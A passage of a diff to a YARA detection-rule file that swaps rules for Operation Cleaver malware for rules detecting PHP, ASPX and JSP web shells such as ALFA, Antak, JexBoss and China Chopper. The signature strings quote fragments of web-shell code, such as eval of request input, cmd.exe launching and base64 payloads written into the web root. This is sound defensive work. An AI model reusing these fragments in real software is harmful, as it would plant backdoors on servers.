+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9628-L9643"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab421bea251ed3fda4304cd180e5c31f7ae55d3d8b26d6cf5f1cf11bacee9b8d"
+		logic_hash = "6f4bdf8aecd527335c29a8e964c7d8688c3e77419595d3fd10a6cf3704711816"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0a118eb23399000d148186b9079fa59caf4c3faa7e7a8f91533e467ac9b6ff41"
+		hash1 = "6362372850ac7455fa9461ed0483032a1886543f213a431f81a2ac76d383b47e"
 
 	strings:
-		$s1 = "%s\\%s.dll" fullword wide
-		$s2 = "yurdkr.dll" fullword ascii
-		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
+		$s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/lola.php\" ;" fullword ascii
+		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
+		$s3 = "fwrite($fp,base64_decode('" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "cb36dcb9909e29a38c387b8a87e7e4ed" or ( 2 of them ) )
+		( uint16( 0 ) == 0x6324 and filesize < 2KB and all of them )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Backdoorlogger
+rule SIGNATURE_BASE_Wsoshell_0Bbebaf46F87718Caba581163D4Beed56Ddf73A7 : FILE
 {
 	meta:
-		description = "Keylogger used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "e9149baa-83c0-597f-833c-ea0241bb60e6"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L3-L17"
+		description = "Detects a web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92165645-5392-588d-ba2a-5ef6b7499a5a"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9645-L9659"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7716b21e85d7e9fb1e1503071c6cd7dc2f4713051e0b03013e3d123a0d800a6"
-		score = 70
+		logic_hash = "bf5090fb909fea690c8a2af3cca35136eda3b9773976189158c25fb8877cc266"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d053086907aed21fbb6019bf9e644d2bae61c63563c4c3b948d755db3e78f395"
 
 	strings:
-		$s1 = "BackDoorLogger"
-		$s2 = "zhuAddress"
+		$s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii
+		$s9 = "$mosimage_session = \"" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Jasus
+rule SIGNATURE_BASE_Webshell_Generic_1609_A : FILE
 {
 	meta:
-		description = "ARP cache poisoner used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "8e04b258-e071-5974-9778-b9d0b97be8d5"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L19-L34"
+		description = "Auto-generated rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b7db4db-8699-5b4d-ab90-ce79f1160984"
+		date = "2016-09-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9661-L9676"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d6cd7f0f264a0bfdc6af422baa1a0e257cb8f4c39a2cb27a1edaf70201e8564"
-		score = 70
+		logic_hash = "e5a4bba3a7b1c712203fcc8b85e4089b0ff18a26e96f5a04529616dbfb9de651"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "c817a490cfd4d6377c15c9ac9bcfa136f4a45ff5b40c74f15216c030f657d035"
+		hash3 = "69b9d55ea2eb4a0d9cfe3b21b0c112c31ea197d1cb00493d1dddc78b90c5745e"
 
 	strings:
-		$s1 = "pcap_dump_open"
-		$s2 = "Resolving IPs to poison..."
-		$s3 = "WARNNING: Gateway IP can not be found"
+		$s1 = "return $qwery45234dws($b);" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and 1 of them )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Loggermodule
+rule SIGNATURE_BASE_Nishang_Webshell : FILE
 {
 	meta:
-		description = "Keylogger used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "949e7ff4-2102-5c89-83c9-f7ba64745661"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L36-L50"
+		description = "Detects a ASPX web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "785e6da7-097e-598b-9799-ffe43738d718"
+		date = "2016-09-11"
+		modified = "2025-11-03"
+		reference = "https://github.com/samratashok/nishang"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9678-L9693"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd937bc3fc7054874a3c61bbef859dd8a8ec37872a30be6d3e1776957f98db80"
-		score = 70
+		logic_hash = "b8a3c8e80a4e41e556e2d65df4126d84723ded6ca623302afc4cc328bded346c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s-%02d%02d%02d%02d%02d.r"
-		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+		$s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii
+		$s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii
+		$s3 = "<title>Antak Webshell</title>" fullword ascii
+		$s4 = "<asp:Button ID=\"executesql\" runat=\"server\" Text=\"Execute SQL Query\"" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x253C and filesize < 100KB and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Netc
+rule SIGNATURE_BASE_PHP_Webshell_1_Feb17 : FILE
 {
 	meta:
-		description = "Net Crawler used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "68f32662-0d7d-5dfa-8bfd-ca41d383e19c"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L52-L66"
+		description = "Detects a simple cloaked PHP web shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eedf87c9-2dab-530d-b5d8-a4c2ebc87821"
+		date = "2017-02-28"
+		modified = "2025-11-03"
+		reference = "https://isc.sans.edu/diary/Analysis+of+a+Simple+PHP+Backdoor/22127"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9705-L9726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7da739c33da91f07e9e35ceab88a37477372998b4cf4b692b8d26cd1a4d936de"
-		score = 70
+		logic_hash = "c8576b20ec3f81b3ef0aa5a508c94e07d591d68767cb4598ad10778b4305915d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "NetC.exe" wide
-		$s2 = "Net Service"
+		$h1 = "<?php ${\"\\x" ascii
+		$x1 = "\";global$auth;function sh_decrypt_phase($data,$key){${\"" ascii
+		$x2 = "global$auth;return sh_decrypt_phase(sh_decrypt_phase($" ascii
+		$x3 = "]}[\"\x64\"]);}}echo " ascii
+		$x4 = "\"=>@phpversion(),\"\\x" ascii
+		$s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
+		$s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Shellcreator2
+rule SIGNATURE_BASE_Webshell_Tiny_JSP_2 : FILE
 {
 	meta:
-		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
-		author = "Cylance Inc."
-		id = "b62336c3-39e5-55f8-98df-6c2a2cb0764a"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L68-L82"
+		description = "Detects a tiny webshell - chine chopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b628c4f9-eb07-592d-834a-5c94e41987da"
+		date = "2015-12-05"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9728-L9740"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5422cf4e4809c1183c3c9870d9a5ddcf806082d8cae81a014255f5f18576101d"
-		score = 70
+		logic_hash = "6fd514df9d53293a8cfd4b9c807f993558e39979592aa221f18cd76079c00fb7"
+		score = 100
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ShellCreator2.Properties"
-		$s2 = "set_IV"
+		$s1 = "<%eval(Request(" nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 40 and all of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Smartcopy2
+rule SIGNATURE_BASE_Wordpress_Config_Webshell_Preprend : FILE
 {
 	meta:
-		description = "Malware or hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "898d9060-208a-5dfb-a452-50ab49b80a9d"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L84-L98"
+		description = "Webshell that uses standard Wordpress wp-config.php file and appends the malicious code in front of it"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2a432c53-5dee-5a2e-9ccf-9e5d52713af9"
+		date = "2017-06-25"
+		modified = "2025-11-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9752-L9774"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5b83588fa80558cd387511d38e9d1c51c488216b9cd27e848d8bdc59cd8ce348"
-		score = 70
+		logic_hash = "97d7b85fa191380fe8b26ea60c8735a8f7179acc3a496ff0fc0dc5eefde2fe8a"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "SmartCopy2.Properties"
-		$s2 = "ZhuFrameWork"
+		$x1 = " * @package WordPress" fullword ascii
+		$s1 = "define('DB_NAME'," ascii
+		$s2 = "require_once(ABSPATH . 'wp-settings.php');" ascii
+		$fp1 = "iThemes Security Config" ascii
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x68703f3c and filesize < 400KB and $x1 and all of ( $s* ) and not $x1 in ( 0 .. 1000 ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Synflooder
+rule SIGNATURE_BASE_PAS_Webshell_Encoded : FILE
 {
 	meta:
-		description = "Malware or hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "bdaf02f4-1226-569b-9f55-999be7ff397a"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L100-L115"
+		description = "Detects a PAS webshell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6cb547ad-7a97-5c3d-83e1-114ea798ddb8"
+		date = "2017-07-11"
+		modified = "2025-11-03"
+		reference = "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9785-L9820"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5349931c4eb5733f9bf05e7cfac6a434063a01d802665f70384cb29d9ae2a3d"
-		score = 70
+		logic_hash = "59f4f8caa60c2367b46f6af1aefa62e03e228b382ff58be3a27dad527a685eca"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
-		$s2 = "s IP is : %s"
-		$s3 = "Raw TCP Socket Created successfully."
+		$head1 = "<?php $____=" fullword ascii
+		$head2 = "'base'.(32*2).'"
+		$enc1 = "isset($_COOKIE['___']" ascii
+		$enc2 = "if($___!==NULL){" ascii
+		$enc3 = ").substr(md5(strrev($" ascii
+		$enc4 = "]))%256);$" ascii
+		$enc5 = "]))@setcookie('" ascii
+		$enc6 = "]=chr(( ord($_" ascii
+		$x1 = { 3D 0A 27 29 29 3B 69 66 28 69 73 73 65 74 28 24 5F 43 4F 4F 4B 49 45 5B 27 }
+		$foot1 = "value=\"\"/><input type=\"submit\" value=\"&gt;\"/></form>"
+		$foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>"
 
 	condition:
-		all of them
+		( uint32( 0 ) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in ( 0 .. 20 ) or 1 of ( $x* ) ) ) or $foot1 at ( filesize -52 ) or $foot2 at ( filesize -44 )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Tinyzbot
+rule SIGNATURE_BASE_ALFA_SHELL : FILE
 {
 	meta:
-		description = "Tiny Bot used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "4fad21a6-a900-5afb-876d-99a6d93e0c2c"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L117-L138"
+		description = "Detects web shell often used by Iranian APT groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f0be44ec-bff0-5d01-aabd-df7aa05383e3"
+		date = "2017-09-21"
+		modified = "2025-11-03"
+		reference = "Internal Research - APT33"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9832-L9850"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fdc41fbec71602e13105a03a4f44319a139018bda00e87e8f4d9b5e2f6269c14"
-		score = 70
+		logic_hash = "651568b2b95c9e5c2b60fb3245e5afe4290235979e3df15bad96ccd08ae234ef"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a39d8823d54c55e60a7395772e50d116408804c1a5368391a1e5871dbdc83547"
 
 	strings:
-		$s1 = "NetScp" wide
-		$s2 = "TinyZBot.Properties.Resources.resources"
-		$s3 = "Aoao WaterMark"
-		$s4 = "Run_a_exe"
-		$s5 = "netscp.exe"
-		$s6 = "get_MainModule_WebReference_DefaultWS"
-		$s7 = "remove_CheckFileMD5Completed"
-		$s8 = "http://tempuri.org/"
-		$s9 = "Zhoupin_Cleaver"
+		$x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii
+		$x2 = "#solevisible@gmail.com" fullword ascii
+		$x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii
+		$x4 = "$GLOBALS['__ALFA__']" fullword ascii
+		$x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii
+		$f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A }
 
 	condition:
-		(( $s1 and $s2 ) or ( $s3 and $s4 and $s5 ) or ( $s6 and $s7 and $s8 ) or $s9 )
+		( filesize < 900KB and 2 of ( $x* ) or $f1 at ( filesize -22 ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhoupinexploitcrew
+rule SIGNATURE_BASE_Webshell_FOPO_Obfuscation_APT_ON_Nov17_1 : FILE
 {
 	meta:
-		description = "Keywords used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "4e7457a0-e6e1-535c-b04b-ad313b496ce1"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L140-L154"
+		description = "Detects malware from NK APT incident DE"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0122bb03-8ff0-554d-8fee-458f0ddd7664"
+		date = "2017-11-17"
+		modified = "2025-11-03"
+		reference = "Internal Research - ON"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9852-L9871"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1541f1ebc026d3eaf9b62150085415d12523ee1395fb8cf7ade8608a1b0a11b6"
-		score = 70
+		logic_hash = "3c5bc3ee0218d4ce6902e49d7f938264ecd158f1f458e2fcef878f06f003ed08"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ed6e2e0027d3f564f5ce438984dc8a54577df822ce56ce079c60c99a91d5ffb1"
 
 	strings:
-		$s1 = "zhoupin exploit crew" nocase
-		$s2 = "zhopin exploit crew" nocase
+		$x1 = "Obfuscation provided by FOPO" fullword ascii
+		$s1 = "\";@eval($" ascii
+		$f1 = { 22 29 29 3B 0D 0A 3F 3E }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in ( 0 .. 350 ) and $f1 at ( filesize -23 ) ) )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Antivirusdetector
+rule SIGNATURE_BASE_Webshell_Jexboss_JSP_1 : FILE
 {
 	meta:
-		description = "Hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "25ab4eaf-eae7-5a55-bed4-42f621d5f06c"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L156-L171"
+		description = "Detects JexBoss JSPs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4fe7a20b-dc2b-509b-bcf8-e3bfbbe7431a"
+		date = "2018-11-08"
+		modified = "2025-11-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9873-L9890"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a8c2bbd27efab4c5579ea143abbd2f71c477dfd0ddbfb1741359e4d34140d9b"
-		score = 70
+		logic_hash = "f540bbc88bffd0c961837416bd5166fd3cb54b6124ffffbf1cd60e49ab01bd30"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "41e0fb374e5d30b2e2a362a2718a5bf16e73127e22f0dfc89fdb17acbe89efdf"
 
 	strings:
-		$s1 = "getShadyProcess"
-		$s2 = "getSystemAntiviruses"
-		$s3 = "AntiVirusDetector"
+		$x1 = "equals(\"jexboss\")"
+		$x2 = "%><pre><%if(request.getParameter(\"ppp\") != null &&" ascii
+		$s1 = "<%@ page import=\"java.util.*,java.io.*\"%><pre><% if (request.getParameter(\""
+		$s2 = "!= null && request.getHeader(\"user-agent\"" ascii
+		$s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Csext
+rule SIGNATURE_BASE_Webshell_Jexboss_WAR_1 : FILE
 {
 	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "f865eae5-9988-5533-a004-e1694761a557"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L173-L188"
+		description = "Detects JexBoss versions in WAR form"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0973f6cf-8a5f-5449-812e-36aa6b9939df"
+		date = "2018-11-08"
+		modified = "2025-11-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9892-L9915"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b4d070b71b685608ab84e757d01293749f2c017a6cd5b6ade6591264adc9836b"
-		score = 70
+		logic_hash = "ee9cb22496d2e36d215caa9c7e295b41cb8434322a0097bbc3d1a365dce0c156"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "6271775ab144ce9bb9138bf054b149b5813d3beb96338993c6de35330f566092"
+		hash2 = "6f14a63c3034d3762da8b3ad4592a8209a0c88beebcb9f9bd11b40e879f74eaf"
 
 	strings:
-		$s1 = "COM+ System Extentions"
-		$s2 = "csext.exe"
-		$s3 = "COM_Extentions_bin"
+		$ = "jbossass" fullword ascii
+		$ = "jexws.jsp" fullword ascii
+		$ = "jexws.jspPK" fullword ascii
+		$ = "jexws1.jsp" fullword ascii
+		$ = "jexws1.jspPK" fullword ascii
+		$ = "jexws2.jsp" fullword ascii
+		$ = "jexws2.jspPK" fullword ascii
+		$ = "jexws3.jsp" fullword ascii
+		$ = "jexws3.jspPK" fullword ascii
+		$ = "jexws4.jsp" fullword ascii
+		$ = "jexws4.jspPK" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 4KB and 1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Kagent
+rule SIGNATURE_BASE_Webshell_Tinyasp : FILE
 {
 	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "32d20495-eeed-5b2b-915d-cad60fa991f6"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L190-L204"
+		description = "Detects 24 byte ASP webshell and variations"
+		author = "Jeff Beley"
+		id = "38b1f61b-e506-59b2-9157-d0345431c429"
+		date = "2019-01-09"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9917-L9928"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd72ade7d40db830dc980def5107261f9cb41b713f9a0a1b2f41f7658b31653e"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "d8b7db89ea623d5bcf14476779df727827cfc752d4c6ba4208445fd7305e6943"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		hash1 = "1f29905348e136b66d4ff6c1494d6008ea13f9551ad5aa9b991893a31b37e452"
 
 	strings:
-		$s1 = "kill command is in last machine, going back"
-		$s2 = "message data length in B64: %d Bytes"
+		$s1 = "Execute Request" ascii wide nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 150 and 1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Mimikatzwrapper
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Mar21_1 : FILE
 {
 	meta:
-		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "e9427e29-e581-5a5b-8f1d-4b9bfeec0946"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L206-L220"
+		description = "Detects ASPX Web Shells"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52884135-6b86-5e3e-a866-36a812d5a9af"
+		date = "2021-03-12"
+		modified = "2025-11-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9930-L9956"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c643e248a9d8dd653ec99f8b59cdc7af945857a6a0321f93cc6983e85f84baba"
-		score = 70
+		logic_hash = "0c20163871bf424c0b594c4b75d35e782df03761552f792474761c603ddb8478"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "10b6e82125a2ddf3cc31a238e0d0c71a64f902e0d77171766713affede03174d"
+		hash2 = "170bee832df176aac0a3c6c7d5aa3fee413b4572030a24c994a97e70f6648ffc"
+		hash3 = "31c4d1fc81c052e269866deff324dffb215e7d481a47a2b6357a572a3e685d90"
+		hash4 = "41b5c26ac194439612b68e9ec6a638eceaf00842c347ffa551eb009ef6c015a3"
+		hash5 = "4b645bc773acde2b3cc204e77ac27c3f6991046c3b75f42d12bc90ec29cff9e3"
+		hash6 = "602bb701b78895d4de32f5e78f3c511e5298ba244b29641b11a7c1c483789859"
+		hash7 = "7ac47a17c511e25c06a53a1c7a5fbbf05f41f047a4a40b71afa81ce7b59f4b03"
+		hash8 = "9a5097d0e8dc29a2814adac070c80fd4b149b33e56aaaf9235af9e87b0501d91"
+		hash9 = "9efb5932c0753e45504fc9e8444209b92c2bdf22e63b1c1a44e2d52cb62b4548"
+		hash10 = "d40b16307d6434c3281374c0e1bbc0f6db388883e7f6266c3c81de0694266882"
 
 	strings:
-		$s1 = "mimikatzWrapper"
-		$s2 = "get_mimikatz"
+		$s1 = ".StartInfo.FileName = 'cmd.exe';" ascii
+		$s2 = "<xsl:template match=\"\"/root\"\">" ascii fullword
+		$s3 = "<?xml version=\"\"1.0\"\"?><root>test</root>\";" ascii fullword
 
 	condition:
-		all of them
